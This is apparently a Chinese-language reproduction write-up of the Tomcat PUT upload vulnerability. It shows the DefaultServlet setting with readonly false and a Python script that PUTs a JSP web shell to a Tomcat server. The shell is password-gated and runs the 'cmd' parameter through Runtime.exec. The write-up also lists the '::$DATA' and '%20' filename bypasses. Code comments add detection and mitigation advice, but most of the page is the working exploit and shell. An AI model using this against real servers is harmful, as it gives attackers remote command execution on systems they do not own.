启动 Tomcat
成因
允许 PUT：在下面 DefaultServlet 的配置中把 readonly 设为 false。这一项需要自己加上，因为后来官方已经修复了。
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
返回状态码 201 表示上传成功，204 表示文件已存在。
验证脚本（上传测试页并检查返回状态）：
import urllib3
class RequestAbs:
    """Thin urllib3 wrapper used on this page to send raw HTTP requests.

    Each verb method issues exactly one request, stores the response's
    status code in ``self.status`` and returns the urllib3 response object
    untouched, so the caller can inspect both the code (e.g. 201/204 from a
    PUT against a writable DefaultServlet) and the body.
    """

    # Fixed request headers; this one dict is shared by every instance and
    # is also the default bound to the ``header`` parameter of each verb.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64)',
    }
    # Class-level connection pool: created once when the class body runs
    # and shared by all instances (no per-instance pool is created).
    http = urllib3.PoolManager()
    # Status code of the most recent request; stays 0 until one is sent.
    status = 0

    def POST(self, url: str, header = headers, retries=False, redirect=False, body = """"""):
        """Send a POST to ``url`` with ``body``; record and return the response.

        ``retries=False`` and ``redirect=False`` go straight to urllib3, so
        (per urllib3) nothing is retried, transport errors are raised as-is,
        and 3xx responses are returned rather than followed — ``self.status``
        is therefore the first hop's status.
        """
        response = self.http.request('POST', url, body=body, headers=header, redirect=redirect, retries=retries)
        self.status = response.status
        return response

    def GET(self, url: str, header = headers, retries=False, redirect=False):
        """Send a GET to ``url``; record the status and return the response.

        Same retry/redirect semantics as ``POST``; no body is sent.
        """
        response = self.http.request('GET', url, retries=retries, redirect=redirect, headers=header)
        self.status = response.status
        return response

    def PUT(self, url: str, header = headers, retries=False, redirect=False, body = """"""):
        """Send a PUT of ``body`` to ``url``; record the status and return the response.

        Same retry/redirect semantics as ``POST``.  A PUT is only honoured by
        a DefaultServlet whose ``readonly`` init-param is false; the page
        text notes 201 for a created file and 204 for an existing one.
        """
        response = self.http.request('PUT', url, retries=retries, redirect=redirect, headers=header, body=body)
        self.status = response.status
        return response

    def DAta(self, response, encode = "'utf-8'") -> str:
        """Return ``response.data`` decoded with codec ``encode``.

        NOTE(review): the default literally contains the quote characters
        ("'utf-8'"), not the bare name 'utf-8'.  CPython's codec-name
        normalisation appears to tolerate the stray punctuation, but callers
        should pass a plain codec name — confirm on the interpreter in use.
        """
        return response.data.decode(encode)
# Test page this script uploads.  It is a JSP that, when the ``pwd`` request
# parameter equals the hard-coded "023" and ``cmd`` is non-empty, hands
# ``cmd`` to Runtime.exec and echoes the output inside <pre>; otherwise it
# prints ":-)".
# Defender's view: a DefaultServlet configured with readonly=false accepts
# this body from any client that can send a PUT, with no authentication; the
# hard-coded password inside the page does nothing to limit that write.
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
# Reuses the wrapper above; RE.status will hold the PUT's status code.
RE = RequestAbs()
# NOTE: the local name ``DAta`` shadows the method ``RequestAbs.DAta`` — here
# it holds the raw urllib3 response, not a decoded string.
# The request path ends in "/" (``l.jsp/``); presumably this works by the same
# mechanism as the ``::$DATA`` and ``%20`` variants the text below describes
# (the request is not treated as a JSP and falls through to DefaultServlet) —
# the page itself does not explain the "/" form.
# Mitigation / detection: leave ``readonly`` at its default (true) and restrict
# PUT through a security-constraint; in access logs, a PUT answered with 201
# or 204 on a path ending in ``.jsp/``, ``.jsp::$DATA`` or ``.jsp%20`` is the
# signature of this write.
DAta = RE.PUT(
    url="http://localhost:8080/l.jsp/",
    body=body
)
# Decoded response body, then the status: 201 = created, 204 = already existed.
print(RE.DAta(DAta))
print(RE.status)
利用 Windows 文件系统的特性，以下面两种文件名方式上传时，Tomcat 不会把请求当作 jsp 文件处理，而是交给 DefaultServlet，因而能够成功创建 jsp 文件：
如
xxx.jsp::$DATA
xxx.jsp%20
官方是如何修复的？
next
原理参考：
https://developer.aliyun.com/article/213792